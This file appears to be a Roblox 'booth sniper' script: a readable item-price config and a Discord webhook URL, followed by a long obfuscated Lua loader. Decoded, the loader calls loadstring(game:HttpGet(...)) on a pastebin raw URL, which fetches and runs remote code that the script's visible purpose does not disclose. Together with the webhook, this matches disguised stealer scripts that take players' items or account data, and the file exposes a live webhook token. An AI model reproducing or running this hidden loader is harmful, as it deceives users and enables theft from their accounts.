getgenv().config = {
    boothSniper = {
        autoSnipe = true,
        snipeItem = {
            {Class = "Misc", Name = "Epic Glitch Core", Price = 60000},
            {Class = "Misc", Name = "Rainbow Mini Chest", Price = 600000},
            {Class = "Misc", Name = "Mini Chest", Price = 20000},
            {Class = "Misc", Name = "Secret Key Upper Part", Price = 10000},
            {Class = "Misc", Name = "Mini Pinata", Price = 40000}
        }
    },
    snipingMethod = "Terminal" --Terminal/Manual/Automated | Automated checks if terminal is not working and then uses manual.
}

webhook = "https://discord.com/api/webhooks/1189216042250149918/Hk4tcVmlMgWWDY4fhXaIrEm-3jMY74yCjJDE5ppUh8pQiSJOXhGz_rR4_ZfXGXjYcOkL"

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...) return {...},v12("#",...);end v18=6;end if (v18==2) then function v22() local v31=619 -(555 + 64) ;local v32;while true do if (v31==(2 -1)) then return v32;end if (v31==(0 -0)) then v32=v1(v16,v19,v19);v19=v19 + (1 -0) ;v31=2 -1 ;end end end v23=nil;function v23() local v33,v34=v1(v16,v19,v19 + (933 -(857 + 74)) );v19=v19 + (570 -(367 + 201)) ;return (v34 * (1183 -(214 + 713))) + v33 ;end v18=3;end if (v18==4) then function v25() local v35=v24();local v36=v24();local v37=1 + 0 ;local v38=(v21(v36,1 + 0 ,897 -(282 + 595) ) * ((1639 -(1523 + 114))^(29 + 3))) + v35 ;local v39=v21(v36,29 -8 ,31);local v40=((v21(v36,1097 -(50 + 18 + 997) )==(1271 -(226 + 1044))) and  -(4 -3)) or (118 -(32 + 85)) ;if (v39==0) then if (v38==(0 + 0)) then return v40 * 0 ;else v39=1 + (0 -0) ;v37=957 -(892 + 65) ;end elseif (v39==2047) then return ((v38==(0 -0)) and (v40 * ((1 -(0 + 0))/0))) or (v40 * NaN) ;end return v8(v40,v39-(1877 -854) ) * (v37 + (v38/(((1399 -1047) -(87 + 263))^(232 -(67 + 113))))) ;end v26=nil;function v26(v41) local v42;if  not v41 then local v84=0;while true do if (v84==((1949 -(915 + 82)) -(802 + 150))) then v41=v24();if (v41==(0 -0)) then return "";end break;end end end v42=v3(v16,v19,(v19 + v41) -(1 -0) );v19=v19 + v41 ;local v43={};for v68=1 + 0 , #v42 do v43[v68]=v2(v1(v3(v42,v68,v68)));end return v6(v43);end v18=5;end if (v18==6) then v29=nil;function v29() local v44=304 -(244 + 60) ;local v45;local v46;local v47;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v44==(292 -(60 + 230))) then v49=nil;v50=nil;v44=3 + 0 ;end if (4==v44) then v53=nil;while true do if (v45==(574 -(426 + 146))) then v50=nil;v51=nil;v45=3;end if (v45~=(1 + 2)) then else local v96=0;while true do if (v96==(1457 -(282 + 1174))) then v45=815 -(569 + 242) ;break;end if (v96==(0 -0)) then v52=nil;v53=nil;v96=1 + 0 ;end end end if (v45~=(1024 -(706 + 318))) then else v46=1251 -(721 + 530) ;v47=nil;v45=1 + 0 ;end if (v45==4) then while true do if (v46==(1273 -(945 + 326))) then local v128=0;while true do if (v128~=(0 -0)) then else v51=nil;v52=nil;v128=1;end if (v128==(1 + 0)) then v46=3;break;end end end if (v46~=1) then else local v129=0;local v130;while true do if (v129==(0 + 0)) then v130=1138 -(782 + 356) ;while true do if (v130==1) then v46=702 -(271 + 429) ;break;end if (v130==(0 + 0)) then local v141=0 -0 ;while true do if (v141==(1500 -(1408 + 92))) then v49=nil;v50=nil;v141=1087 -(461 + 625) ;end if (v141==(1289 -(993 + 295))) then v130=1;break;end end end end break;end end end if (3~=v46) then else v53=nil;while true do local v135=0 + 0 ;local v136;while true do if ((1171 -(418 + 753))~=v135) then else v136=0 + 0 ;while true do if (v136~=(1 + 0)) then else if ((0 -0)==v47) then local v142=1018 -(697 + 321) ;local v143;while true do if (v142~=(0 -0)) then else v143=0;while true do if (v143==(1 + 1)) then v47=1;break;end if (v143==(0 + 0)) then local v150=0 + 0 ;while true do if (v150==(529 -(406 + 123))) then v48={};v49={};v150=1;end if (v150==(1 + 0)) then v143=1;break;end end end if (v143==(1 -0)) then local v151=0 -0 ;while true do if (v151==(1769 -(1749 + 20))) then v50={};v51={v48,v49,nil,v50};v151=2 -1 ;end if (v151==(2 -1)) then v143=2;break;end end end end break;end end end break;end if (v136==(1900 -(106 + 1794))) then if (v47==2) then local v144=0;local v145;local v146;while true do if (v144==(1 + 0)) then while true do if (v145==(0 -0)) then v146=0 + 0 ;while true do local v152=0 + 0 ;while true do if (v152==(0 -0)) then if (v146==(441 -(382 + 58))) then return v51;end if (v146==(0 -0)) then local v160=114 -(4 + 110) ;while true do if (v160~=(584 -(57 + 527))) then else for v162=1,v24() do local v163=0 + 0 ;local v164;local v165;while true do if (v163==(1 -0)) then while true do if (v164~=(1427 -(41 + 1386))) then else v165=v22();if (v21(v165,1,1)==(103 -(17 + 86))) then local v174=0 + 0 ;local v175;local v176;local v177;local v178;local v179;while true do if ((1 -0)==v174) then v177=nil;v178=nil;v174=5 -3 ;end if (v174~=(168 -(122 + 44))) then else v179=nil;while true do if (v175==(0 -0)) then local v181=0 -0 ;while true do if (v181==(1 + 0)) then v175=1691 -(1121 + 569) ;break;end if ((0 + 0)==v181) then v176=214 -(22 + 192) ;v177=nil;v181=684 -(483 + 200) ;end end end if (v175==(1465 -(1404 + 59))) then while true do if (v176==(0 -0)) then local v182=0 -0 ;while true do if (v182~=1) then else v176=1;break;end if (v182~=0) then else v177=v21(v165,2 -0 ,68 -(30 + 35) );v178=v21(v165,769 -(468 + 297) ,5 + 1 );v182=1258 -(1043 + 214) ;end end end if ((7 -5)~=v176) then else local v183=0 -0 ;local v184;while true do if (v183~=0) then else v184=0;while true do if (v184==(1 -0)) then v176=3;break;end if (v184~=(1212 -(323 + 889))) then else local v190=0 -0 ;while true do if (v190~=1) then else v184=1;break;end if ((0 + 0)==v190) then if (v21(v178,581 -(361 + 219) ,2 -1 )~=(321 -(53 + 267))) then else v179[1 + 1 ]=v53[v179[4 -2 ]];end if (v21(v178,2,415 -(15 + 398) )==(2 -1)) then v179[985 -(18 + 964) ]=v53[v179[11 -8 ]];end v190=1 + 0 ;end end end end break;end end end if (v176==(1 + 0)) then local v185=0;local v186;while true do if (v185~=(0 -0)) then else v186=0 + 0 ;while true do if (v186==0) then local v191=850 -(20 + 830) ;while true do if (v191==(163 -(92 + 71))) then v179={v23(),v23(),nil,nil};if (v177==0) then local v196=126 -(116 + 10) ;local v197;local v198;while true do if ((0 + 0)==v196) then local v200=0;while true do if (v200~=(738 -(542 + 196))) then else v197=0 -0 ;v198=nil;v200=1 -0 ;end if ((1 + 0)==v200) then v196=1;break;end end end if (v196==(1 + 0)) then while true do if (0==v197) then v198=0;while true do if (v198~=(126 -(55 + 71))) then else v179[3 -0 ]=v23();v179[1794 -(573 + 1217) ]=v23();break;end end break;end end break;end end elseif (v177==(1 + 0)) then v179[2 + 1 ]=v24();elseif (v177==2) then v179[7 -4 ]=v24() -((4 -2)^(25 -9)) ;elseif (v177==(942 -(714 + 225))) then local v202=0 -0 ;local v203;local v204;while true do if (v202==(1552 -(1126 + 425))) then while true do if ((405 -(118 + 287))==v203) then v204=0;while true do if (v204~=0) then else v179[11 -8 ]=v24() -((1123 -(118 + 1003))^16) ;v179[11 -7 ]=v23();break;end end break;end end break;end if (v202==(0 -0)) then v203=377 -(142 + 235) ;v204=nil;v202=1;end end end v191=4 -3 ;end if (v191==1) then v186=1;break;end end end if (v186==(1 + 0)) then v176=979 -(553 + 424) ;break;end end break;end end end if ((5 -2)==v176) then if (v21(v178,51 -(25 + 23) ,3 + 0 )==(1 + 0)) then v179[4]=v53[v179[3 + 1 ]];end v48[v162]=v179;break;end end break;end if (v175==(1 + 0)) then v178=nil;v179=nil;v175=2 + 0 ;end end break;end if (v174==(0 -0)) then v175=0;v176=nil;v174=2 -1 ;end end end break;end end break;end if (v163~=(0 -0)) then else v164=97 -(11 + 86) ;v165=nil;v163=2 -1 ;end end end for v166=1 + 0 ,v24() do v49[v166-(2 -1) ]=v29();end v160=4 -3 ;end if (v160==(4 -3)) then v146=754 -(239 + 514) ;break;end end end break;end end end break;end end break;end if (v144~=(0 -0)) then else v145=0 + 0 ;v146=nil;v144=1330 -(797 + 532) ;end end end if ((1 + 0)==v47) then local v147=0;local v148;local v149;while true do if (v147~=(1 + 0)) then else while true do if (v148==(0 + 0)) then v149=0 + 0 ;while true do if (v149~=(2 -1)) then else for v155=1203 -(373 + 829) ,v52 do local v156=0 + 0 ;local v157;local v158;local v159;while true do if (v156~=(732 -(476 + 255))) then else v159=nil;while true do if (v157==(1131 -(369 + 761))) then if (v158==(734 -(711 + 22))) then v159=v22()~=(0 -0) ;elseif (v158==(2 + 0)) then v159=v25();elseif (v158~=(1 + 2)) then else v159=v26();end v53[v155]=v159;break;end if ((0 -0)==v157) then local v169=0 -0 ;local v170;while true do if (v169==(1744 -(1344 + 400))) then v170=0 -0 ;while true do if (v170~=(238 -(64 + 174))) then else local v172=0;local v173;while true do if (v172==(0 + 0)) then v173=0;while true do if (v173~=0) then else local v180=0 + 0 ;while true do if (v180==(0 -0)) then v158=v22();v159=nil;v180=1 -0 ;end if (v180~=(3 -2)) then else v173=1;break;end end end if (v173~=(337 -(144 + 192))) then else v170=217 -(42 + 174) ;break;end end break;end end end if ((1 + 0)==v170) then v157=407 -(183 + 223) ;break;end end break;end end end end break;end if (v156~=0) then else local v161=0;while true do if (v161==1) then v156=1;break;end if (0==v161) then local v171=0 + 0 ;while true do if (v171==(1 + 0)) then v161=1 + 0 ;break;end if (v171==0) then v157=337 -(10 + 327) ;v158=nil;v171=1505 -(363 + 1141) ;end end end end end end end v51[1583 -(1183 + 397) ]=v22();v149=5 -3 ;end if (v149==(451 -(108 + 341))) then v47=2;break;end if (v149~=0) then else local v154=0 + 0 ;while true do if ((0 -0)==v154) then v52=v24();v53={};v154=1494 -(711 + 782) ;end if (v154~=(1 -0)) then else v149=1 + 0 ;break;end end end end break;end end break;end if (v147==(0 + 0)) then v148=0;v149=nil;v147=1976 -(1913 + 62) ;end end end v136=1;end end break;end end end break;end if (v46~=0) then else local v131=0 + 0 ;while true do if (v131~=(1 + 0)) then else v46=2 -1 ;break;end if (v131==0) then v47=1933 -(565 + 1368) ;v48=nil;v131=3 -2 ;end end end end break;end if (v45==1) then local v97=0;while true do if (v97==(1 + 0)) then v45=2;break;end if (v97~=0) then else v48=nil;v49=nil;v97=1662 -(1477 + 184) ;end end end end break;end if (v44==(3 -0)) then v51=nil;v52=nil;v44=4;end if (v44==(2 -1)) then v47=nil;v48=nil;v44=2 + 0 ;end if (v44==(856 -(564 + 292))) then v45=0 -0 ;v46=nil;v44=2 -1 ;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v54) if (v1(v54,2)==79) then v20=v0(v3(v54,1,1));return "";else local v85=v2(v0(v54,16));if v20 then local v91=v5(v85,v20);v20=nil;return v91;else return v85;end end end);v18=1;end if (v18==3) then v24=nil;function v24() local v55,v56,v57,v58=v1(v16,v19,v19 + 3 );v19=v19 + (1171 -(645 + 522)) ;return (v58 * (16779006 -(1010 + 780))) + (v57 * 65536) + (v56 * (256 + (0 -0))) + v55 ;end v25=nil;v18=4;end if (v18==7) then function v30(v59,v60,v61) local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...) local v70=v62;local v71=v63;local v72=v64;local v73=v28;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v86=0,v78 do if (v86>=v72) then v76[v86-v72 ]=v77[v86 + 1 ];else v80[v86]=v77[v86 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do v82=v70[v74];v83=v82[1];if (v83<=3) then if (v83<=1) then if (v83>0) then do return;end else local v98;local v99,v100;local v101;local v102;v80[v82[2]]=v61[v82[3]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v61[v82[3]];v74=v74 + 1 ;v82=v70[v74];v102=v82[2];v101=v80[v82[3]];v80[v102 + 1 ]=v101;v80[v102]=v101[v82[4]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v102=v82[2];v99,v100=v73(v80[v102](v13(v80,v102 + 1 ,v82[3])));v75=(v100 + v102) -1 ;v98=0;for v132=v102,v75 do v98=v98 + 1 ;v80[v132]=v99[v98];end v74=v74 + 1 ;v82=v70[v74];v102=v82[2];v80[v102]=v80[v102](v13(v80,v102 + 1 ,v75));v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]();v74=v74 + 1 ;v82=v70[v74];do return;end end elseif (v83==2) then local v112=v82[2];local v113=v80[v82[3]];v80[v112 + 1 ]=v113;v80[v112]=v113[v82[4]];else v80[v82[2]]=v61[v82[3]];end elseif (v83<=5) then if (v83==4) then local v119=v82[2];v80[v119]=v80[v119](v13(v80,v119 + 1 ,v75));else local v121=0;local v122;local v123;local v124;local v125;while true do if (v121==2) then for v138=v122,v75 do v125=v125 + 1 ;v80[v138]=v123[v125];end break;end if (v121==0) then v122=v82[2];v123,v124=v73(v80[v122](v13(v80,v122 + 1 ,v82[3])));v121=1;end if (v121==1) then v75=(v124 + v122) -1 ;v125=0;v121=2;end end end elseif (v83==6) then v80[v82[2]]=v82[3];else v80[v82[2]]();end v74=v74 + 1 ;end end;end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v65,v66,v67) if v67 then local v89=(v65/((5 -3)^(v66-1)))%((1838 -(1045 + 791))^(((v67-(2 -1)) -(v66-(1 -0))) + (506 -((1910 -(1381 + 178)) + 154)))) ;return v89-(v89%(1575 -(1281 + 275 + 18))) ;else local v90=(268 -(28 + 238))^(v66-(2 -1)) ;return (((v65%(v90 + v90))>=v90) and 1) or 0 ;end end v22=nil;v18=2;end end end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F5A5030385848623800083O00124O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
